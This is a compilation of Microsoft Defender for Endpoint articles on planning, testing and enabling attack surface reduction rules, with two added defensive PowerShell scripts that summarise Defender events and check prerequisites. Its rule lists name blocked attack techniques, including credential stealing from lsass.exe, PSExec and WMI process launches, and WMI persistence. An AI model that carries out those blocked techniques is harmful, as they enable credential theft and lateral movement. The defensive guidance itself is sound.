| Attack surface reduction | Windows Defender (Operational) | 1121 | Event when rule fires in Block-mode |

Note

From the user's perspective, attack surface reduction Warn mode notifications are
made as a Windows Toast Notification for attack surface reduction rules.

In attack surface reduction, Network Protection provides only Audit and Block
modes.
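Reviewing these events in Event Viewer one at a time does not scale once audit mode has been on for a week. The following added example, which is not part of the Microsoft documentation, pulls the Windows Defender/Operational events from the table above with Get-WinEvent and labels each with its feature and mode; it also serves the "Review attack surface reduction events in Windows Event Viewer" section later on this page. It assumes rights to read the log, and the EventData field names it reads ('ID', 'Path', 'Process Name') are an assumption about the 1121/1122 record layout, not something this page states.

```powershell
# Added example (not from the Microsoft documentation): read the attack surface reduction,
# controlled folder access and network protection events from the Windows Defender/Operational
# log and label each one with the feature and mode from the event table above.
# Assumes rights to read the log. The EventData field names used below ('ID' for the rule GUID,
# 'Path' and 'Process Name' for the file and process) are an assumption about the 1121/1122
# record layout; fields that are absent simply come back empty.
$EventMap = @{
    1121 = @{ Feature = 'Attack surface reduction'; Mode = 'Block' }
    1122 = @{ Feature = 'Attack surface reduction'; Mode = 'Audit' }
    1123 = @{ Feature = 'Controlled folder access'; Mode = 'Block' }
    1124 = @{ Feature = 'Controlled folder access'; Mode = 'Audit' }
    1125 = @{ Feature = 'Network protection';       Mode = 'Audit' }
    1126 = @{ Feature = 'Network protection';       Mode = 'Block' }
    1127 = @{ Feature = 'Controlled folder access'; Mode = 'Block (sector write)' }
    1128 = @{ Feature = 'Controlled folder access'; Mode = 'Audit (sector write)' }
    5007 = @{ Feature = 'Settings change';          Mode = 'n/a' }
}

function Get-AsrEventSummary {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = [int[]]@($EventMap.Keys)
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # -ErrorAction SilentlyContinue: Get-WinEvent raises an error when nothing matches
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Pull the named EventData fields out of the record's XML rendering
        $field = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) {
            if ($d.Name) { $field[$d.Name] = $d.'#text' }
        }
        $info = $EventMap[[int]$e.Id]
        [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = $e.Id
            Feature = $info.Feature
            Mode    = $info.Mode
            RuleId  = $field['ID']
            Path    = $field['Path']
            Process = $field['Process Name']
        }
    }
}

$summary = @(Get-AsrEventSummary -Hours 168)

# Per-rule audit vs block counts: the "noisy" rules the text asks you to look for show up here
$summary | Where-Object { $_.Feature -eq 'Attack surface reduction' } |
    Group-Object RuleId, Mode | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize

# Every feature, one line per event, newest first; 5007 rows are settings changes and are
# worth reviewing on their own because unexpected ones can indicate tampering
$summary | Sort-Object Time -Descending |
    Select-Object Time, EventId, Feature, Mode, Process, Path | Format-Table -AutoSize
```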

Resources to learn more about attack surface reduction
As mentioned in the video, Defender for Endpoint includes several attack surface
reduction capabilities. Use the following resources to learn more:

| Article | Description |
| --- | --- |
| Application control | Use application control so that your applications must earn trust in order to run. |
| Attack surface reduction rules reference | Provides details about each attack surface reduction rule. |
| Attack surface reduction rules deployment guide | Presents overview information and prerequisites for deploying attack surface reduction rules, followed by step-by-step guidance for testing (audit mode), enabling (block mode) and monitoring. |
| Controlled folder access | Help prevent malicious or suspicious apps (including file-encrypting ransomware malware) from making changes to files in your key system folders (Requires Microsoft Defender Antivirus). |
| Device control | Protects against data loss by monitoring and controlling media used on devices, such as removable storage and USB drives, in your organization. |
| Exploit protection | Help protect the operating systems and apps your organization uses from being exploited. Exploit protection also works with third-party antivirus solutions. |
| Hardware-based isolation | Protect and maintain the integrity of a system as it starts and while it's running. Validate system integrity through local and remote attestation. Use container isolation for Microsoft Edge to help guard against malicious websites. |
| Network protection | Extend protection to your network traffic and connectivity on your organization's devices. (Requires Microsoft Defender Antivirus). |
| Test attack surface reduction rules | Provides steps to use audit mode to test attack surface reduction rules. |
| Web protection | Web protection lets you secure your devices against web threats and helps you regulate unwanted content. |

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Attack surface reduction rules overview
Article • 11/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

Why attack surface reduction rules are important
Your organization's attack surface includes all the places where an attacker could
compromise your organization's devices or networks. Reducing your attack surface
means protecting your organization's devices and network, which leaves attackers with
fewer ways to perform attacks. Configuring attack surface reduction rules in Microsoft
Defender for Endpoint can help!

Attack surface reduction rules target certain software behaviors, such as:

Launching executable files and scripts that attempt to download or run files
Running obfuscated or otherwise suspicious scripts
Performing behaviors that apps don't usually initiate during normal day-to-day
work

Such software behaviors are sometimes seen in legitimate applications. However, these
behaviors are often considered risky because they're commonly abused by attackers
through malware. Attack surface reduction rules can constrain software-based risky
behaviors and help keep your organization safe.

For a sequential, end-to-end process of how to manage attack surface reduction rules,
see:

Attack surface reduction rules deployment overview


Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules

Assess rules before deployment

You can assess how an attack surface reduction rule might affect your network by
opening the security recommendation for that rule in Microsoft Defender Vulnerability
Management.

In the recommendation details pane, check for user impact to determine what
percentage of your devices can accept a new policy enabling the rule in blocking mode
without adversely affecting productivity.

See Requirements in the "Enable attack surface reduction rules" article for information
about supported operating systems and other requirement information.

Audit mode for evaluation

Audit mode
Use audit mode to evaluate how attack surface reduction rules would affect your
organization if enabled. Run all rules in audit mode first so you can understand how
they affect your line-of-business applications. Many line-of-business applications are
written with limited security concerns, and they might perform tasks in ways that seem
similar to malware.

Exclusions
By monitoring audit data and adding exclusions for necessary applications, you can
deploy attack surface reduction rules without reducing productivity.

Per-rule exclusions
For information about configuring per-rule exclusions, see the section titled Configure
attack surface reduction rules per-rule exclusions in the article Test attack surface
reduction rules.

Warn mode for users

(NEW!) Prior to warn mode capabilities, attack surface reduction rules that are enabled
could be set to either audit mode or block mode. With the new warn mode, whenever
content is blocked by an attack surface reduction rule, users see a dialog box that
indicates the content is blocked. The dialog box also offers the user an option to
unblock the content. The user can then retry their action, and the operation completes.
When a user unblocks content, the content remains unblocked for 24 hours, and then
blocking resumes.

Warn mode helps your organization have attack surface reduction rules in place without
preventing users from accessing the content they need to perform their tasks.

Requirements for warn mode to work

Warn mode is supported on devices running the following versions of Windows:

Windows 10, version 1809 or later


Windows 11
Windows Server, version 1809 or later

Microsoft Defender Antivirus must be running with real-time protection in Active mode.

Also, make sure Microsoft Defender Antivirus and antimalware updates are installed.

Minimum platform release requirement: 4.18.2008.9


Minimum engine release requirement: 1.1.17400.5

For more information and to get your updates, see Update for Microsoft Defender
antimalware platform .

Cases where warn mode isn't supported

Warn mode isn't supported for three attack surface reduction rules when you configure them in Microsoft Intune. (If you use Group Policy to configure your attack surface reduction rules, warn mode is supported.) The three rules that don't support warn mode when you configure them in Microsoft Intune are as follows:

Block JavaScript or VBScript from launching downloaded executable content (GUID d3e037e1-3eb8-44c8-a917-57927947596d)
Block persistence through WMI event subscription (GUID e6db77e5-3df2-4cf1-b95a-636979351e5b)
Use advanced protection against ransomware (GUID c1db55ab-c21a-4637-bb3f-a12568109d35)

Also, warn mode isn't supported on devices running older versions of Windows. In those cases, attack surface reduction rules that are configured to run in warn mode run in block mode instead.

Notifications and alerts

Whenever an attack surface reduction rule is triggered, a notification is displayed on the
device. You can customize the notification with your company details and contact
information.

Also, when certain attack surface reduction rules are triggered, alerts are generated.

Notifications and any alerts that are generated can be viewed in the Microsoft Defender portal.

For specific details about notification and alert functionality, see: Per rule alert and
notification details, in the article Attack surface reduction rules reference.

Advanced hunting and attack surface reduction events
You can use advanced hunting to view attack surface reduction events. To streamline the
volume of incoming data, only unique processes for each hour are viewable with
advanced hunting. The time of an attack surface reduction event is the first time that
event is seen within the hour.

For example, suppose that an attack surface reduction event occurs on 10 devices
during the 2:00 PM hour. Suppose that the first event occurred at 2:15, and the last at
2:45. With advanced hunting, you see one instance of that event (even though it actually
occurred on 10 devices), and its timestamp will be 2:15 PM.

For more information about advanced hunting, see Proactively hunt for threats with
advanced hunting.

Attack surface reduction features across Windows versions
You can set attack surface reduction rules for devices that are running any of the
following editions and versions of Windows:

Windows 10 Pro, version 1709 or later

Windows 10 Enterprise, version 1709 or later

Windows Server, version 1803 (Semi-Annual Channel) or later

Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012 R2

Note

Windows Server 2016 and Windows Server 2012 R2 will need to be onboarded using the instructions in Onboard Windows servers for this feature to work.

Although attack surface reduction rules don't require a Windows E5 license, if you have
Windows E5, you get advanced management capabilities. The advanced capabilities -
available only in Windows E5 - include:

The monitoring, analytics, and workflows available in Defender for Endpoint
The reporting and configuration capabilities in Microsoft Defender XDR.

These advanced capabilities aren't available with a Windows Professional or Windows E3 license. However, if you do have those licenses, you can use Event Viewer and Microsoft Defender Antivirus logs to review your attack surface reduction rule events.

Review attack surface reduction events in the Microsoft Defender portal
Defender for Endpoint provides detailed reporting for events and blocks as part of alert
investigation scenarios.

You can query Defender for Endpoint data in Microsoft Defender XDR by using
advanced hunting.

Here's an example query:

Kusto

DeviceEvents
| where ActionType startswith 'Asr'

Review attack surface reduction events in Windows Event Viewer
You can review the Windows event log to view events generated by attack surface
reduction rules:

1. Download the Evaluation Package and extract the file cfa-events.xml to an easily
accessible location on the device.

2. Enter the words, Event Viewer, into the Start menu to open the Windows Event
Viewer.

3. Under Actions, select Import custom view....

4. Select the file cfa-events.xml from where it was extracted. Alternatively, copy the
XML directly.

5. Select OK.

You can create a custom view that filters events to only show the following events, all of
which are related to controlled folder access:

| Event ID | Description |
| --- | --- |
| 5007 | Event when settings are changed |
| 1121 | Event when rule fires in Block-mode |
| 1122 | Event when rule fires in Audit-mode |

The "engine version" listed for attack surface reduction events in the event log is generated by Defender for Endpoint, not by the operating system. Defender for Endpoint is integrated with Windows 10 and Windows 11, so this feature works on all devices with Windows 10 or Windows 11 installed.

See also
Attack surface reduction rules deployment overview
Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules
Attack surface reduction rules report
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS


Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Attack surface reduction rules
deployment overview
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

Attack surfaces are all the places where your organization is vulnerable to cyberthreats
and attacks. Reducing your attack surface means protecting your organization's devices
and network, which leaves attackers with fewer ways to attack. Configuring Microsoft
Defender for Endpoint attack surface reduction rules can help.

Attack surface reduction rules target certain software behaviors, such as:

Launching executable files and scripts that attempt to download or run files
Running obfuscated or otherwise suspicious scripts
Behaviors that apps don't usually perform during normal day-to-day work

By reducing the different attack surfaces, you can help prevent attacks from happening
in the first place.

This deployment collection provides information about the following aspects of attack
surface reduction rules:

attack surface reduction rules requirements
plan for attack surface reduction rules deployment
test attack surface reduction rules
configure and enable attack surface reduction rules
attack surface reduction rules best practices
attack surface reduction rules advanced hunting
attack surface reduction rules event viewer

Attack surface reduction rules deployment steps

As with any new, wide-scale implementation that could potentially impact your line-of-business operations, it's important to be methodical in your planning and implementation. Careful planning and deployment of attack surface reduction rules is necessary to ensure they work best for your unique workflows. To work in your environment, you need to plan, test, implement, and operationalize attack surface reduction rules carefully.

Important predeployment caveat

We recommend that you enable the following three standard protection rules. See Attack surface reduction rules by type for important details about the two types of attack surface reduction rules.

Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block abuse of exploited vulnerable signed drivers
Block persistence through Windows Management Instrumentation (WMI) event subscription

Typically, you can enable the standard protection rules with minimal-to-no noticeable
impact to the end user. For an easy method to enable the standard protection rules, see
Simplified standard protection option.

Note

For customers who are using a non-Microsoft HIPS and are transitioning to
Microsoft Defender for Endpoint attack surface reduction rules, Microsoft advises
running the HIPS solution alongside attack surface reduction rules deployment until
the moment you shift from Audit mode to Block mode. Keep in mind that you must
reach out to your non-Microsoft antivirus provider for exclusion recommendations.

Before you begin testing or enabling attack surface reduction rules

During your initial preparation, it's vital to understand the capabilities of the systems that you put in place. Understanding those capabilities helps you determine which attack surface reduction rules are most important for protecting your organization. Additionally, there are several prerequisites that you must attend to in preparation for your attack surface reduction deployment.

Important

This guide provides images and examples to help you decide how to configure
attack surface reduction rules; these images and examples might not reflect the
best configuration options for your environment.

Before you start, review Overview of attack surface reduction, and Demystifying attack
surface reduction rules - Part 1 for foundational information. To understand the areas
of coverage and potential impact, familiarize yourself with the current set of attack
surface reduction rules; see Attack surface reduction rules reference. While you're
familiarizing yourself with the attack surface reduction rules set, take note of the per-
rule GUID mappings; see Attack surface reduction rule to GUID matrix.

Attack surface reduction rules are only one capability of the attack surface reduction
capabilities within Microsoft Defender for Endpoint. This document goes into more
detail on deploying attack surface reduction rules effectively to stop advanced threats
like human-operated ransomware and other threats.

Attack surface reduction rules list by category

The following table shows attack surface reduction rules by category:

Polymorphic threats:
Block executable files from running unless they meet a prevalence (1,000 machines), age, or trusted list criteria
Block untrusted and unsigned processes that run from USB
Use advanced protection against ransomware

Lateral movement & credential theft:
Block process creations originating from PSExec and WMI commands
Block credential stealing from the Windows local security authority subsystem (lsass.exe) [2]
Block persistence through WMI event subscription

Productivity apps rules:
Block Office apps from creating executable content
Block Office apps from creating child processes
Block Office apps from injecting code into other processes
Block Adobe Reader from creating child processes

Email rules:
Block executable content from email client and webmail
Block only Office communication applications from creating child processes
Block Office communication apps from creating child processes

Script rules:
Block obfuscated JS/VBS/PS/macro code
Block JS/VBS from launching downloaded executable content

Misc rules:
Block abuse of exploited vulnerable signed drivers [1]

(1) Block abuse of exploited vulnerable signed drivers is now available under Endpoint
Security > Attack Surface Reduction.

(2) Some attack surface reduction rules generate considerable noise, but don't block
functionality. For example, if you're updating Chrome, Chrome accesses lsass.exe;
passwords are stored in lsass on the device. However, Chrome shouldn't be accessing
local device lsass.exe. If you enable the rule to block access to lsass, you see many
events. Those events are good events because the software update process shouldn't
access lsass.exe. Using this rule blocks Chrome updates from accessing lsass, but won't
block Chrome from updating. This is also true of other applications that make
unnecessary calls to lsass.exe. The block access to lsass rule blocks unnecessary calls to
lsass, but doesn't block the application from running.

Attack surface reduction infrastructure requirements

Although multiple methods of implementing attack surface reduction rules are possible, this guide is based on an infrastructure consisting of:

Microsoft Entra ID
Microsoft Intune
Windows 10 and Windows 11 devices
Microsoft Defender for Endpoint E5 or Windows E5 licenses

To take full advantage of attack surface reduction rules and reporting, we recommend using a Microsoft Defender XDR E5 or Windows E5 license (or A5). Learn more at Minimum requirements for Microsoft Defender for Endpoint.

Note

There are multiple methods to configure attack surface reduction rules. Attack
surface reduction rules can be configured using: Microsoft Intune, PowerShell,
Group Policy, Microsoft Configuration Manager (ConfigMgr), Intune OMA-URI. If
you are using a different infrastructure configuration than what is listed for
Infrastructure requirements, you can learn more about deploying attack surface
reduction rules using other configurations here: Enable attack surface reduction
rules.

Attack surface reduction rules dependencies

Microsoft Defender Antivirus must be enabled and configured as the primary antivirus solution, and must be in the following mode:

Primary antivirus/antimalware solution
State: Active mode

Microsoft Defender Antivirus must not be in any of the following modes:

Passive
Passive Mode with Endpoint detection and response (EDR) in Block Mode
Limited periodic scanning (LPS)
Off

See Cloud-delivered protection and Microsoft Defender Antivirus for more.

Cloud Protection (MAPS) must be enabled to enable attack surface reduction rules

Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These cloud protection services, also referred to as Microsoft Advanced Protection Service (MAPS), enhance standard real-time protection, arguably providing the best antivirus defense. Cloud protection is critical to preventing breaches from malware and is a critical component of attack surface reduction rules. Turn on cloud-delivered protection in Microsoft Defender Antivirus.

Microsoft Defender Antivirus components must be current versions for attack surface reduction rules

The following Microsoft Defender Antivirus component versions must be no more than two versions older than the most-currently-available version:

Microsoft Defender Antivirus platform update version: the Microsoft Defender Antivirus platform is updated monthly.
Microsoft Defender Antivirus engine version: the Microsoft Defender Antivirus engine is updated monthly.
Microsoft Defender Antivirus security intelligence: Microsoft continually updates Microsoft Defender security intelligence (also known as definitions and signatures) to address the latest threats and to refine detection logic.

Keeping Microsoft Defender Antivirus versions current helps reduce attack surface
reduction rules false positive results and improves Microsoft Defender Antivirus
detection capabilities. For more details on the current versions and how to update the
different Microsoft Defender Antivirus components visit Microsoft Defender Antivirus
platform support.

Caveat

Some rules don't work well if unsigned, internally developed applications and scripts are in heavy use. It's more difficult to deploy attack surface reduction rules if code signing isn't enforced.

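The dependencies above (active-mode Defender Antivirus, cloud-delivered protection on, current component versions) can be checked on a device before rules are rolled out. The following is an added example, not code from the Microsoft documentation; it assumes the Defender PowerShell module (Get-MpComputerStatus, Get-MpPreference) is available, and the function name Test-AsrReadiness is hypothetical.

```powershell
# Added example (not from the Microsoft documentation): checks the Defender
# Antivirus prerequisites listed in this article before ASR rules are deployed.
# Assumes the Defender PowerShell module is present (Windows 10/11 with
# Microsoft Defender Antivirus installed).
function Test-AsrReadiness {
    [CmdletBinding()]
    param()

    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Defender Antivirus must be enabled and be the active (primary) product.
    #    AMRunningMode reports 'Normal' when active; values such as
    #    'Passive Mode' or 'EDR Block Mode' mean ASR rules will not apply.
    if (-not $status.AMServiceEnabled -or -not $status.AntivirusEnabled) {
        $findings.Add('Microsoft Defender Antivirus is not enabled.')
    }
    if ($status.AMRunningMode -ne 'Normal') {
        $findings.Add("Defender Antivirus is in '$($status.AMRunningMode)', not active mode.")
    }
    if (-not $status.RealTimeProtectionEnabled) {
        $findings.Add('Real-time protection is turned off.')
    }

    # 2. Cloud-delivered protection (MAPS) must be on.
    #    MAPSReporting: 0 = disabled, 1 = basic, 2 = advanced.
    if ($pref.MAPSReporting -eq 0) {
        $findings.Add('Cloud-delivered protection (MAPS) is disabled.')
    }

    # 3. Component versions must be no more than two releases behind current.
    #    The latest versions are not known offline, so they are reported here
    #    for comparison against the Defender Antivirus platform support article.
    $versions = [pscustomobject]@{
        Platform             = $status.AMProductVersion
        Engine               = $status.AMEngineVersion
        SecurityIntelligence = $status.AntivirusSignatureVersion
        SignatureAgeDays     = $status.AntivirusSignatureAge
    }

    [pscustomobject]@{
        Ready    = ($findings.Count -eq 0)
        Findings = $findings.ToArray()
        Versions = $versions
    }
}

$result = Test-AsrReadiness
$result.Findings | ForEach-Object { Write-Warning $_ }
$result.Versions | Format-List
if ($result.Ready) {
    'Device meets the ASR rule prerequisites; compare the versions above with the platform support article.'
}
```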
Other articles in this deployment collection
Test attack surface reduction rules

Enable attack surface reduction rules

Operationalize attack surface reduction rules

Attack surface reduction rules reference

Reference

Blogs
Demystifying attack surface reduction rules - Part 1

Demystifying attack surface reduction rules - Part 2

Demystifying attack surface reduction rules - Part 3

Demystifying attack surface reduction rules - Part 4

Attack surface reduction rules collection


Overview of attack surface reduction

Use attack surface reduction rules to prevent malware infection

Enable attack surface reduction rules - alternate configurations

Attack surface reduction rules reference

Attack surface reduction FAQ

Microsoft Defender
Address false positives/negatives in Microsoft Defender for Endpoint

Cloud-delivered protection and Microsoft Defender Antivirus

Turn on cloud-delivered protection in Microsoft Defender Antivirus

Configure and validate exclusions based on extension, name, or location

Microsoft Defender Antivirus platform support


Overview of inventory in the Microsoft 365 Apps admin center

Create a deployment plan for Windows

Use role-based access control (RBAC) and scope tags for distributed IT in Intune

Assign device profiles in Microsoft Intune

Management sites
Microsoft Intune admin center

Attack surface reduction

Attack surface reduction rules configurations

Attack surface reduction rules exclusions

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.



Plan attack surface reduction rules deployment
Article • 09/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Before you test or enable attack surface reduction rules, you should plan your
deployment. Careful planning helps you test your attack surface reduction rules
deployment and get ahead of any rule exceptions. When planning to test attack surface
reduction rules, make sure you start with the right business unit. Start with a small group
of people in a specific business unit. You can identify some champions within a
particular business unit who can provide feedback to help tune your implementation.

Important

While you're going through the process of planning, auditing, and enabling attack surface reduction rules, it's recommended that you enable the following three standard protection rules. See Attack surface reduction rules by type for important details about the two types of attack surface reduction rules.

Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block abuse of exploited vulnerable signed drivers
Block persistence through Windows Management Instrumentation (WMI) event subscription

You can typically enable the standard protection rules with minimal noticeable impact to the end user. For an easy method to enable the standard protection rules, see: Simplified standard protection option.

Start your ASR rules deployment with the right business unit

How you select the business unit to roll out your attack surface reduction rules deployment depends on factors such as:

Size of business unit
Availability of attack surface reduction rules champions
Distribution and usage of:
    Software
    Shared folders
    Use of scripts
    Office macros
Other entities affected by attack surface reduction rules

Depending on your business needs, you might decide to include multiple business units
to get a broad sampling of software, shared folders, scripts, macros, etc. You might
decide to limit the scope of your first attack surface reduction rules rollout to a single
business unit. Then, repeat the entire attack surface reduction rules rollout process to
your other business units, one-at-a-time.

Identify ASR rules champions

Attack surface reduction rules champions are members in your organization who can
help with your initial attack surface reduction rules rollout during the preliminary testing
and implementation phases. Your champions are typically employees who are more
technically adept, and who aren't derailed by intermittent work-flow outages. The
champions' involvement continues throughout the broader expansion of attack surface
reduction rules deployment to your organization. Your attack surface reduction rules
champions are first to experience each level of the attack surface reduction rules rollout.

It's important to provide a feedback and response channel for your attack surface
reduction rules champions to alert you to attack surface reduction rules-related work
disruptions and receive attack surface reduction rules-rollout related communications.

Get inventory of line-of-business apps and understand the business unit processes

Having a full understanding of the applications and per-business-unit processes that are
used across your organization is critical to a successful attack surface reduction rules
deployment. Additionally, it's imperative that you understand how those apps are used
within the various business units in your organization. To start, you should get an
inventory of the apps that are approved for use across the breadth of the organization.
You can use tools such as the Microsoft 365 Apps admin center to help inventory
software applications. See: Overview of inventory in the Microsoft 365 Apps admin
center.

Define reporting and response ASR rules team roles and responsibilities

Clearly articulating roles and responsibilities of persons responsible for monitoring and communicating attack surface reduction rules status and activity is a core activity of attack surface reduction maintenance. Therefore, it's important to determine:

The person or team responsible for gathering reports
How and with whom reports are shared
How escalation is addressed for newly identified threats or unwanted blockages caused by attack surface reduction rules

Typical roles and responsibilities include:

IT admins: Implement attack surface reduction rules, manage exclusions, work with different business units on apps and processes, and assemble and share reports with stakeholders
Certified security operations center (CSOC) analyst: Responsible for investigating high-priority blocked processes to determine whether the threat is valid or not
Chief information security officer (CISO): Responsible for the overall security posture and health of the organization

ASR rules ring deployment

For large enterprises, Microsoft recommends deploying attack surface reduction rules in "rings." Rings are groups of devices, visually represented as concentric circles that radiate outward like nonoverlapping tree rings. When deployment to the innermost ring succeeds, you can move the next ring into the testing phase. Thorough assessment of your business units, attack surface reduction rules champions, apps, and processes is imperative to defining your rings. In most cases, your organization has deployment rings for phased rollouts of Windows updates. You can use your existing ring design to implement attack surface reduction rules. See: Create a deployment plan for Windows.

Other articles in this deployment collection
Attack surface reduction rules deployment overview

Test attack surface reduction rules

Enable attack surface reduction rules

Operationalize attack surface reduction rules

Attack surface reduction rules reference

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.



Test attack surface reduction rules
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Testing Microsoft Defender for Endpoint attack surface reduction rules helps you
determine if rules impede line-of-business operations prior to enabling any rule. By
starting with a small, controlled group, you can limit potential work disruptions as you
expand your deployment across your organization.

In this section of the attack surface reduction rules deployment guide, you'll learn how
to:

configure rules using Microsoft Intune
use Microsoft Defender for Endpoint attack surface reduction rules reports
configure attack surface reduction rules exclusions
enable attack surface reduction rules using PowerShell
use Event Viewer for attack surface reduction rules events

Note

Before you begin testing attack surface reduction rules, it is recommended that you
first disable all rules that you have previously set to either audit or enable (if
applicable). See Attack surface reduction rules reports for information about using
the attack surface reduction rules report to disable attack surface reduction rules.

Begin your attack surface reduction rules deployment with ring 1.

Step 1: Test attack surface reduction rules using Audit

Begin the testing phase by turning on the attack surface reduction rules with the rules
set to Audit, starting with your champion users or devices in ring 1. Typically, the
recommendation is that you enable all the rules (in Audit) so that you can determine
which rules are triggered during the testing phase. Rules that are set to Audit don't
generally impact functionality of the entity or entities to which the rule is applied but do
generate logged events for the evaluation; there is no effect on end users.

Configure attack surface reduction rules using Intune

You can use Microsoft Intune Endpoint Security to configure custom attack surface
reduction rules.

1. Open the Microsoft Intune admin center .

2. Go to Endpoint Security > Attack surface reduction.

3. Select Create Policy.

4. In Platform, select Windows 10, Windows 11, and Windows Server, and in Profile,
select Attack surface reduction rules.

5. Select Create.

6. In the Basics tab of the Create profile pane, in Name add a name for your policy.
In Description add a description for your attack surface reduction rules policy.

7. In the Configuration settings tab, under Attack Surface Reduction Rules, set all
rules to Audit mode.

Note

There are variations in some attack surface reduction rules mode listings;
Blocked and Enabled provide the same functionality.

8. [Optional] In the Scope tags pane, you can add tag information to specific devices.
You can also use role-based access control and scope tags to make sure that the
right admins have the right access and visibility to the right Intune objects. Learn
more: Use role-based access control (RBAC) and scope tags for distributed IT in
Intune.

9. In the Assignments pane, you can deploy or "assign" the profile to your user or
device groups. Learn more: Assign device profiles in Microsoft Intune

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

10. Review your settings in the Review + create pane. Click Create to apply the rules.

Your new attack surface reduction policy for attack surface reduction rules is listed in
Endpoint security | Attack surface reduction.

Step 2: Understand the attack surface reduction rules reporting page in the Microsoft Defender portal

The attack surface reduction rules reporting page is found in Microsoft Defender portal
> Reports > Attack surface reduction rules. This page has three tabs:

Detections
Configuration
Add exclusions

Detections tab
Provides a 30-day timeline of detected audit and blocked events.

The attack surface reduction rules pane provides an overview of detected events on a
per-rule basis.

Note

There are some variations in attack surface reduction rules reports. Microsoft is in
the process of updating the behavior of the attack surface reduction rules reports
to provide a consistent experience.

Select View detections to open the Detections tab.


The GroupBy and Filter panes provide the following options.

GroupBy returns the result set grouped by one of the following:

No grouping
Detected file
Audit or block
Rule
Source app
Device
User
Publisher

Note

When filtering by rule, the number of individual detected items listed in the lower
half of the report is currently limited to 200 rules. You can use Export to save the
full list of detections to Excel.

Filter opens the Filter on rules page, which enables you to scope the results to only the
selected attack surface reduction rules:

Note

If you have a Microsoft 365 Security E5 or A5, Windows E5 or A5 license, the following link opens the Microsoft Defender 365 Reports > Attack surface reductions > Detections tab.

Configuration tab

Lists, on a per-computer basis, the aggregate state of attack surface reduction rules: Off, Audit, Block.

On the Configurations tab, you can check, on a per-device basis, which attack surface
reduction rules are enabled, and in which mode, by selecting the device for which you
want to review attack surface reduction rules.

The Get started link opens the Microsoft Intune admin center, where you can create or
modify an endpoint protection policy for attack surface reduction:

In Endpoint security | Overview, select Attack surface reduction:

The Endpoint Security | Attack surface reduction pane opens:


Note

If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will
open the Microsoft Defender 365 Reports > Attack surface reductions >
Configurations tab.

Add exclusions
This tab provides a method to select detected entities (for example, false positives) for
exclusion. When exclusions are added, the report provides a summary of the expected
impact.

Note

Microsoft Defender Antivirus AV exclusions are honored by attack surface reduction rules. See Configure and validate exclusions based on extension, name, or location.

Note

If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will
open the Microsoft Defender 365 Reports > Attack surface reductions >
Exclusions tab.

For more information about using the attack surface reduction rules report, see Attack
surface reduction rules reports.

Configure attack surface reduction per-rule exclusions

Attack surface reduction rules now provide the capability to configure rule-specific
exclusions, known as "Per Rule Exclusions."

Note

Per-rule exclusions cannot currently be configured by using PowerShell or Group
Policy.

To configure specific rule exclusions:

1. Open the Microsoft Intune admin center , and navigate to Home > Endpoint
security > Attack surface reduction.

2. If it isn't already configured, set the rule for which you want to configure exclusions
to Audit or Block.

3. In ASR Only Per Rule Exclusion, click the toggle to change from Not configured to
Configured.

4. Enter the names of the files or application that you want to exclude.

5. At the bottom of the Create profile wizard, select Next and follow the wizard instructions.

Tip

Use the checkboxes next to your list of exclusion entries to select items to Delete, Sort, Import, or Export.

Use PowerShell as an alternative method to enable attack surface reduction rules

You can use PowerShell - as an alternative to Intune - to enable attack surface reduction
rules in audit mode to view a record of apps that would have been blocked if the feature
was fully enabled. You can also get an idea of how often the rules fire during normal
use.

To enable an attack surface reduction rule in audit mode, use the following PowerShell
cmdlet:

PowerShell

Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions AuditMode
Where <rule ID> is a GUID value of the attack surface reduction rule.

To enable all the added attack surface reduction rules in audit mode, use the following
PowerShell cmdlet:

PowerShell

(Get-MpPreference).AttackSurfaceReductionRules_Ids | ForEach-Object { Add-MpPreference -AttackSurfaceReductionRules_Ids $_ -AttackSurfaceReductionRules_Actions AuditMode }

Tip

If you want to fully audit how attack surface reduction rules will work in your organization, you'll need to use a management tool to deploy this setting to devices in your network(s).

You can also use Group Policy, Intune, or mobile device management (MDM)
configuration service providers (CSPs) to configure and deploy the setting. Learn more
in the main Attack surface reduction rules article.
